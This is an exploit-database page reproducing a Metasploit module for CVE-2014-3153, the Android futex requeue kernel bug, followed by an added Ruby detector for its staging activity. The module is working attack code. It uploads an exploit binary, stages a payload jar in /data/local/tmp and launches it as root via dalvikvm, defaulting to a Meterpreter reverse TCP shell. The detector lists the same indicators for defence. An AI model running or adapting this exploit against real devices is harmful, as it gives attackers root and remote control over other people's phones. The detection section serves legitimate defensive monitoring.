Android Futex Requeue Kernel Exploit

Published: 10 Feb 2015 00:00:00
Reported by: metasploit
Type: zdt
Source: 0day.today

Android futex requeue kernel vulnerability affecting pre-June 2014 Android phones

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit4 < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common

  def initialize(info={})
    super( update_info( info, {
        'Name'          => 'Android futex requeue kernel exploit',
        'Description'   => %q{
            This module exploits a bug in futex_requeue in the Linux kernel.
            Any Android phone with a kernel built before June 2014 should be vulnerable.
        },
        'License'       => MSF_LICENSE,
        'Author'        => [
            'Pinkie Pie', #discovery 
            'geohot', #towelroot
            'timwr' #metasploit module
        ],
        'References'    =>
        [
            [ 'CVE', '2014-3153' ],
            [ 'URL', 'http://tinyhack.com/2014/07/07/exploiting-the-futex-bug-and-uncovering-towelroot/' ],
            [ 'URL', 'http://blog.nativeflow.com/the-futex-vulnerability' ],
        ],
        'SessionTypes'  => [ 'meterpreter' ],
        'Platform'       => 'android',
        'Targets'        => [[ 'Automatic', { }]],
        'Arch'           => ARCH_DALVIK,
        'DefaultOptions' =>
          {
            'PAYLOAD'  => 'android/meterpreter/reverse_tcp',
          },
        'DefaultTarget' => 0
      }
    ))

    register_options([
        OptString.new("WritableDir", [ true, "Temporary directory to write files", "/data/local/tmp/" ]),
    ], self.class)
  end

  def put_local_file(remotefile)
    localfile = File.join( Msf::Config.data_directory, "exploits", "CVE-2014-3153.elf" )
    data = File.read(localfile, {:mode => 'rb'})
    write_file(remotefile, data)
  end

  def exploit
    workingdir = session.fs.dir.getwd
    exploitfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"
    payloadfile = "#{workingdir}/#{Rex::Text::rand_text_alpha_lower(5)}"

    put_local_file(exploitfile)
    cmd_exec('/system/bin/chmod 700 ' + exploitfile)
    write_file(payloadfile, payload.raw)

    tmpdir = datastore['WritableDir']
    rootclassdir = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}"
    rootpayload = "#{tmpdir}#{Rex::Text::rand_text_alpha_lower(5)}.jar"

    rootcmd = " mkdir #{rootclassdir} && "
    rootcmd += "cd #{rootclassdir} && "
    rootcmd += "cp " + payloadfile + " #{rootpayload} && "
    rootcmd += "chmod 766 #{rootpayload} && "
    rootcmd += "dalvikvm -Xbootclasspath:/system/framework/core.jar -cp #{rootpayload} com.metasploit.stage.Payload"
    
    process = session.sys.process.execute(exploitfile, rootcmd, {'Hidden' => true, 'Channelized' => true})
    process.channel.read
  end

end

#  0day.today [2018-01-08]  #
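
A defender-side check derived from the `rootcmd` string the module builds, as an added example that is not part of the original module or of Metasploit: it flags process command lines where `dalvikvm` loads a `.jar` from the writable staging directory and runs `com.metasploit.stage.Payload`. The `uid pid command` input format, the function names and the sample lines are assumptions constructed for illustration.

```ruby
require 'shellwords'

# Defaults taken from the module above; override if WritableDir was changed.
WRITABLE_DIR = '/data/local/tmp/'
STAGE_CLASS  = 'com.metasploit.stage.Payload'
CORE_JAR_OPT = '-Xbootclasspath:/system/framework/core.jar'

# Constructed sample input, one process per line: "uid pid command line".
SAMPLE_PS = <<~PS
  0 4121 dalvikvm -Xbootclasspath:/system/framework/core.jar -cp /data/local/tmp/qkzpw.jar com.metasploit.stage.Payload
  10089 3990 dalvikvm -cp /system/framework/example.jar com.example.Tool
  2000 4007 /system/bin/sh -c ls /data/local/tmp/
PS

# Returns the indicators (symbols) that one command line matches.
def staging_indicators(cmdline, writable_dir: WRITABLE_DIR)
  argv = Shellwords.split(cmdline)
  return [] unless File.basename(argv.first.to_s) == 'dalvikvm'

  cp_at = argv.index('-cp') || argv.index('-classpath')
  jars  = cp_at ? argv[cp_at + 1].to_s.split(':') : []
  hits  = []
  hits << :core_jar_bootclasspath if argv.include?(CORE_JAR_OPT)
  hits << :jar_in_writable_dir if jars.any? { |j| j.start_with?(writable_dir) && j.end_with?('.jar') }
  hits << :random_5_letter_jar if jars.any? { |j| j.match?(%r{/[a-z]{5}\.jar\z}) }
  hits << :metasploit_stage_class if argv.include?(STAGE_CLASS)
  hits
rescue ArgumentError
  [] # unbalanced quotes, e.g. a truncated log line: nothing to match reliably
end

# Scans ps-style text and reports processes matching at least two indicators.
def scan(ps_text)
  ps_text.each_line.filter_map do |line|
    uid, pid, cmd = line.strip.split(' ', 3)
    next if cmd.nil?

    hits = staging_indicators(cmd)
    { pid: pid.to_i, uid: uid.to_i, root: uid == '0', hits: hits } if hits.size >= 2
  end
end

scan(SAMPLE_PS).each { |f| puts "pid=#{f[:pid]} root=#{f[:root]} #{f[:hits].join(',')}" }
```

The stage class name and the five-letter file name are easy to change, so the `dalvikvm` launch from a writable directory is the indicator to weight most.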

Vulners AI Score: 0.7 (Low risk)
EPSS: 0.75331